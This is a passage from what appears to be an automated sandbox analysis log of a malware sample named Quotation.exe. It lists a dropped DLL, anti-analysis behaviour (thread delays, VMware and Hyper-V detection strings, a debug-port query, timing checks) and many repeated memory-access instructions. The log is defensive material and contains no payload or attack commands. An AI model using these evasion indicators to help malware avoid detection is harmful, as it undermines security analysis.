      Source: C:\Users\user\Desktop\Quotation.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Quotation.exeAPI coverage: 1.2 %
      Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1124Thread sleep count: 51 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1124Thread sleep time: -102000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
      Source: explorer.exe, 00000005.00000000.2521577979.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
      Source: Quotation.exe, 00000000.00000002.2395421770.0000000003396000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
      Source: explorer.exe, 00000005.00000000.2523519321.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
      Source: explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
      Source: explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
      Source: explorer.exe, 00000005.00000000.2520656031.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
      Source: explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: Quotation.exe, 00000003.00000003.2516094710.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2566913391.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2580408016.0000000003E3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
      Source: explorer.exe, 00000005.00000000.2519828963.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
      Source: explorer.exe, 00000005.00000000.2520656031.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
      Source: explorer.exe, 00000005.00000000.2521577979.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
      Source: Quotation.exe, 00000003.00000002.2580312950.0000000003DE8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2516094710.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2566913391.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2580408016.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000005.00000000.2520656031.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
      Source: explorer.exe, 00000005.00000000.2520656031.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
      Source: explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
      Source: explorer.exe, 00000005.00000000.2519828963.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000005.00000000.2521577979.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\Desktop\Quotation.exeAPI call chain: ExitProcess graph end nodegraph_0-5170
      Source: C:\Users\user\Desktop\Quotation.exeAPI call chain: ExitProcess graph end nodegraph_0-5175
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECD1C0 rdtsc 3_2_33ECD1C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00401C48 LdrInitializeThunk,SendMessageTimeoutW,SendMessageW,FindWindowExW,0_2_00401C48
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_73421BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73421BFF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F253FC mov eax, dword ptr fs:[00000030h]3_2_33F253FC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E603E9 mov eax, dword ptr fs:[00000030h]3_2_33E603E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E603E9 mov eax, dword ptr fs:[00000030h]3_2_33E603E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E603E9 mov eax, dword ptr fs:[00000030h]3_2_33E603E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E603E9 mov eax, dword ptr fs:[00000030h]3_2_33E603E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E603E9 mov eax, dword ptr fs:[00000030h]3_2_33E603E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E603E9 mov eax, dword ptr fs:[00000030h]3_2_33E603E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E603E9 mov eax, dword ptr fs:[00000030h]3_2_33E603E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E603E9 mov eax, dword ptr fs:[00000030h]3_2_33E603E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0F3E6 mov eax, dword ptr fs:[00000030h]3_2_33F0F3E6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6E3F0 mov eax, dword ptr fs:[00000030h]3_2_33E6E3F0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6E3F0 mov eax, dword ptr fs:[00000030h]3_2_33E6E3F0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6E3F0 mov eax, dword ptr fs:[00000030h]3_2_33E6E3F0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E863FF mov eax, dword ptr fs:[00000030h]3_2_33E863FF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0B3D0 mov ecx, dword ptr fs:[00000030h]3_2_33F0B3D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A3C0 mov eax, dword ptr fs:[00000030h]3_2_33E5A3C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A3C0 mov eax, dword ptr fs:[00000030h]3_2_33E5A3C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A3C0 mov eax, dword ptr fs:[00000030h]3_2_33E5A3C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A3C0 mov eax, dword ptr fs:[00000030h]3_2_33E5A3C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A3C0 mov eax, dword ptr fs:[00000030h]3_2_33E5A3C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A3C0 mov eax, dword ptr fs:[00000030h]3_2_33E5A3C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E583C0 mov eax, dword ptr fs:[00000030h]3_2_33E583C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E583C0 mov eax, dword ptr fs:[00000030h]3_2_33E583C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E583C0 mov eax, dword ptr fs:[00000030h]3_2_33E583C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E583C0 mov eax, dword ptr fs:[00000030h]3_2_33E583C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED63C0 mov eax, dword ptr fs:[00000030h]3_2_33ED63C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0C3CD mov eax, dword ptr fs:[00000030h]3_2_33F0C3CD
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E733A5 mov eax, dword ptr fs:[00000030h]3_2_33E733A5
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E833A0 mov eax, dword ptr fs:[00000030h]3_2_33E833A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E833A0 mov eax, dword ptr fs:[00000030h]3_2_33E833A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7438F mov eax, dword ptr fs:[00000030h]3_2_33E7438F
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7438F mov eax, dword ptr fs:[00000030h]3_2_33E7438F
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4E388 mov eax, dword ptr fs:[00000030h]3_2_33E4E388
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4E388 mov eax, dword ptr fs:[00000030h]3_2_33E4E388
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4E388 mov eax, dword ptr fs:[00000030h]3_2_33E4E388
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F2539D mov eax, dword ptr fs:[00000030h]3_2_33F2539D
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EA739A mov eax, dword ptr fs:[00000030h]3_2_33EA739A
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EA739A mov eax, dword ptr fs:[00000030h]3_2_33EA739A
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E48397 mov eax, dword ptr fs:[00000030h]3_2_33E48397
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E48397 mov eax, dword ptr fs:[00000030h]3_2_33E48397
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E48397 mov eax, dword ptr fs:[00000030h]3_2_33E48397
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EF437C mov eax, dword ptr fs:[00000030h]3_2_33EF437C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E57370 mov eax, dword ptr fs:[00000030h]3_2_33E57370
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E57370 mov eax, dword ptr fs:[00000030h]3_2_33E57370
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E57370 mov eax, dword ptr fs:[00000030h]3_2_33E57370
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0F367 mov eax, dword ptr fs:[00000030h]3_2_33F0F367
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1A352 mov eax, dword ptr fs:[00000030h]3_2_33F1A352
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4D34C mov eax, dword ptr fs:[00000030h]3_2_33E4D34C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4D34C mov eax, dword ptr fs:[00000030h]3_2_33E4D34C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED035C mov eax, dword ptr fs:[00000030h]3_2_33ED035C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED035C mov eax, dword ptr fs:[00000030h]3_2_33ED035C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED035C mov eax, dword ptr fs:[00000030h]3_2_33ED035C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED035C mov ecx, dword ptr fs:[00000030h]3_2_33ED035C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED035C mov eax, dword ptr fs:[00000030h]3_2_33ED035C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED035C mov eax, dword ptr fs:[00000030h]3_2_33ED035C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F25341 mov eax, dword ptr fs:[00000030h]3_2_33F25341
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E49353 mov eax, dword ptr fs:[00000030h]3_2_33E49353
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E49353 mov eax, dword ptr fs:[00000030h]3_2_33E49353
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7F32A mov eax, dword ptr fs:[00000030h]3_2_33E7F32A
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E47330 mov eax, dword ptr fs:[00000030h]3_2_33E47330
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1132D mov eax, dword ptr fs:[00000030h]3_2_33F1132D
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1132D mov eax, dword ptr fs:[00000030h]3_2_33F1132D
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8A30B mov eax, dword ptr fs:[00000030h]3_2_33E8A30B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8A30B mov eax, dword ptr fs:[00000030h]3_2_33E8A30B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8A30B mov eax, dword ptr fs:[00000030h]3_2_33E8A30B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED930B mov eax, dword ptr fs:[00000030h]3_2_33ED930B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED930B mov eax, dword ptr fs:[00000030h]3_2_33ED930B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED930B mov eax, dword ptr fs:[00000030h]3_2_33ED930B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4C310 mov ecx, dword ptr fs:[00000030h]3_2_33E4C310
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E70310 mov ecx, dword ptr fs:[00000030h]3_2_33E70310
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E602E1 mov eax, dword ptr fs:[00000030h]3_2_33E602E1
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E602E1 mov eax, dword ptr fs:[00000030h]3_2_33E602E1
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E602E1 mov eax, dword ptr fs:[00000030h]3_2_33E602E1
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0F2F8 mov eax, dword ptr fs:[00000030h]3_2_33F0F2F8
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F252E2 mov eax, dword ptr fs:[00000030h]3_2_33F252E2
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E492FF mov eax, dword ptr fs:[00000030h]3_2_33E492FF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E592C5 mov eax, dword ptr fs:[00000030h]3_2_33E592C5
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E592C5 mov eax, dword ptr fs:[00000030h]3_2_33E592C5
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A2C3 mov eax, dword ptr fs:[00000030h]3_2_33E5A2C3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A2C3 mov eax, dword ptr fs:[00000030h]3_2_33E5A2C3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A2C3 mov eax, dword ptr fs:[00000030h]3_2_33E5A2C3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A2C3 mov eax, dword ptr fs:[00000030h]3_2_33E5A2C3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A2C3 mov eax, dword ptr fs:[00000030h]3_2_33E5A2C3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B2C0 mov eax, dword ptr fs:[00000030h]3_2_33E7B2C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B2C0 mov eax, dword ptr fs:[00000030h]3_2_33E7B2C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B2C0 mov eax, dword ptr fs:[00000030h]3_2_33E7B2C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B2C0 mov eax, dword ptr fs:[00000030h]3_2_33E7B2C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B2C0 mov eax, dword ptr fs:[00000030h]3_2_33E7B2C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B2C0 mov eax, dword ptr fs:[00000030h]3_2_33E7B2C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B2C0 mov eax, dword ptr fs:[00000030h]3_2_33E7B2C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7F2D0 mov eax, dword ptr fs:[00000030h]3_2_33E7F2D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7F2D0 mov eax, dword ptr fs:[00000030h]3_2_33E7F2D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4B2D3 mov eax, dword ptr fs:[00000030h]3_2_33E4B2D3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4B2D3 mov eax, dword ptr fs:[00000030h]3_2_33E4B2D3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4B2D3 mov eax, dword ptr fs:[00000030h]3_2_33E4B2D3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E602A0 mov eax, dword ptr fs:[00000030h]3_2_33E602A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E602A0 mov eax, dword ptr fs:[00000030h]3_2_33E602A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E652A0 mov eax, dword ptr fs:[00000030h]3_2_33E652A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E652A0 mov eax, dword ptr fs:[00000030h]3_2_33E652A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E652A0 mov eax, dword ptr fs:[00000030h]3_2_33E652A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E652A0 mov eax, dword ptr fs:[00000030h]3_2_33E652A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE62A0 mov eax, dword ptr fs:[00000030h]3_2_33EE62A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE62A0 mov ecx, dword ptr fs:[00000030h]3_2_33EE62A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE62A0 mov eax, dword ptr fs:[00000030h]3_2_33EE62A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE62A0 mov eax, dword ptr fs:[00000030h]3_2_33EE62A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE62A0 mov eax, dword ptr fs:[00000030h]3_2_33EE62A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE62A0 mov eax, dword ptr fs:[00000030h]3_2_33EE62A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE72A0 mov eax, dword ptr fs:[00000030h]3_2_33EE72A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE72A0 mov eax, dword ptr fs:[00000030h]3_2_33EE72A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED92BC mov eax, dword ptr fs:[00000030h]3_2_33ED92BC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED92BC mov eax, dword ptr fs:[00000030h]3_2_33ED92BC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED92BC mov ecx, dword ptr fs:[00000030h]3_2_33ED92BC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED92BC mov ecx, dword ptr fs:[00000030h]3_2_33ED92BC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F192A6 mov eax, dword ptr fs:[00000030h]3_2_33F192A6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F192A6 mov eax, dword ptr fs:[00000030h]3_2_33F192A6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F192A6 mov eax, dword ptr fs:[00000030h]3_2_33F192A6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F192A6 mov eax, dword ptr fs:[00000030h]3_2_33F192A6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8E284 mov eax, dword ptr fs:[00000030h]3_2_33E8E284
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8E284 mov eax, dword ptr fs:[00000030h]3_2_33E8E284
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED0283 mov eax, dword ptr fs:[00000030h]3_2_33ED0283
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED0283 mov eax, dword ptr fs:[00000030h]3_2_33ED0283
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED0283 mov eax, dword ptr fs:[00000030h]3_2_33ED0283
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F25283 mov eax, dword ptr fs:[00000030h]3_2_33F25283
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8329E mov eax, dword ptr fs:[00000030h]3_2_33E8329E
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8329E mov eax, dword ptr fs:[00000030h]3_2_33E8329E
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E54260 mov eax, dword ptr fs:[00000030h]3_2_33E54260
